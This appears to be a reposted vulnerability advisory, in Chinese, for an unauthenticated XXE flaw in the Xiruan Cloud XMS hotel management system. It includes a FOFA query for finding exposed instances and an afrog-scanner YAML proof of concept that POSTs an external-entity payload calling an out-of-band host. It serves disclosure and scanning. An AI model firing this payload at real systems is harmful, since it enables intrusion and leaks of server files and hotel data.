西软云XMS-futurehotel-operate XXE漏洞

漏洞信息

漏洞名称: 西软云XMS-futurehotel-operate XXE漏洞

漏洞类型: XML实体注入

漏洞等级: 严重

漏洞描述: 西软云XMS是一款面向酒店行业的云管理系统,提供包括前台接待、客房管理、财务管理等功能,广泛应用于各类酒店及住宿服务场所。该系统通过云服务模式部署,便于酒店管理方进行远程操作和数据管理。本次发现的漏洞位于futurehotel-operate接口,该接口负责处理酒店未来订单的相关操作。

该漏洞属于XML外部实体注入(XXE)类型,攻击者可以通过构造恶意的XML请求,利用系统对XML输入的不当处理,读取服务器上的任意文件。具体来说,系统在处理用户提交的XML数据时,未对XML中的外部实体引用进行限制,导致攻击者可以通过定义恶意的外部实体,访问系统内部资源或敏感文件。

此漏洞的利用可能导致严重的安全风险,包括但不限于敏感数据泄露、系统配置信息暴露等。由于攻击者可以通过网络远程发起攻击,且无需任何形式的身份验证,因此该漏洞的威胁等级被评定为“严重”。攻击者可以利用此漏洞自动化地获取服务器上的敏感信息,对受影响的企业造成重大的经济损失和声誉损害。

产品厂商: 西软云

产品名称: 西软云XMS

搜索语法: app=”shiji-西软云XMS”

来源: https://github.com/zan8in/afrog/blob/1823fa1eef54086d619bb8b99776a26190f6a3c1/pocs%2Fafrog-pocs%2Fvulnerability%2Fxiruanyun-xms-futurehotel-operate-xxe.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

id: xiruanyun-xms-futurehotel-operate-xxe

info:
  name: 西软云XMS-futurehotel-operate 接口存在XXE漏洞
  author: zan8in
  severity: critical
  description: |-
    fofa: app="shiji-西软云XMS"
    西软云XMS futurehotel-operate 接口存在XXE漏洞,攻击者可利用该漏洞读取任意文件。
  tags: xiranyun,xxe,shiji
  created: 2025/07/03

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /XopServerRS/rest/futurehotel/operate
      headers:
        Content-Type: text/xml
      body: |
        <!DOCTYPE root [ <!ENTITY % remote SYSTEM "{{oobHTTP}}"> %remote;]>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()


Github Poc
#zan8in/afrog:github commit #XML实体注入
西软云XMS-futurehotel-operate XXE漏洞
http://example.com/2025/07/05/github_691438908/
作者
lianccc
发布于
2025年7月5日
许可协议